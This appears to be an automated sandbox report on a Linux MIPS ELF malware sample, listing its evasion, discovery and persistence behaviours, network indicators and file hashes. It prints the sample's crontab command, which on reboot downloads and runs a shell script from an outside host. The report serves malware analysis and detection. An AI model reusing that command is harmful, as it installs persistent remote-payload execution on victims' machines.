Malware Analysis Report

2024-11-13 15:54

Sample ID 241027-dd85kasfrg
Target cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf
SHA256 cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3
Tags
defense_evasion discovery execution persistence privilege_escalatio
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3

Threat Level: Shows suspicious behavior

The file cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery execution persistence privilege_escalatio

File and Directory Permissions Modification

Renames itself

Unexpected DNS network traffic destination

Creates/modifies Cron job

Changes its process name

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-27 02:54

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-27 02:54

Reported

2024-10-27 02:57

Platform

debian12-mipsel-20240221-en

Max time kernel

151s

Max time network

142s

Command Line

[/tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/sh N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 152.53.15.127 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.wB9D8g /usr/bin/crontab N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself [watchdog/0] /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/769/status /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf N/A
File opened for reading /proc/770/status /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf N/A
File opened for reading /proc/1/cmdline /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf N/A
File opened for reading /proc/747/cmdline /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf N/A
File opened for reading /proc/762/status /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf N/A
File opened for reading /proc/764/status /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf N/A
File opened for reading /proc/768/status /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf N/A
File opened for reading /proc/715/cmdline /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf N/A
File opened for reading /proc/771/status /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf N/A
File opened for reading /proc/773/status /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf N/A
File opened for reading /proc/758/status /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf N/A
File opened for reading /proc/759/status /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf N/A
File opened for reading /proc/713/cmdline /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf N/A
File opened for reading /proc/766/status /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf N/A
File opened for reading /proc/760/status /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf N/A
File opened for reading /proc/772/status /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf N/A
File opened for reading /proc/761/status /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf N/A
File opened for reading /proc/22/cmdline /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf N/A
File opened for reading /proc/763/status /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf N/A

Processes

/tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf

[/tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

Network

Country Destination Domain Proto
DE 152.53.15.127:53 kingstonwikkerink.dyn udp
UA 88.151.195.22:5297 kingstonwikkerink.dyn tcp

Files

/var/spool/cron/crontabs/tmp.wB9D8g

MD5 bfd2089040b748f688b70470021d4d43
SHA1 c2a6fac8ce436a014bb4149d14d7853259b9323c
SHA256 cfb81f43363ede429f69a6c15d63fbfdb87246bd92fc6a55a189c1001bfb4b3b
SHA512 4aee0c647992fff8bc38624556617e8b78523f37f9169ecc32dbc303821881cf90f1fdccc9add3cfc06b6089a8f8e17878173f132a16db77cb152869c2ea487e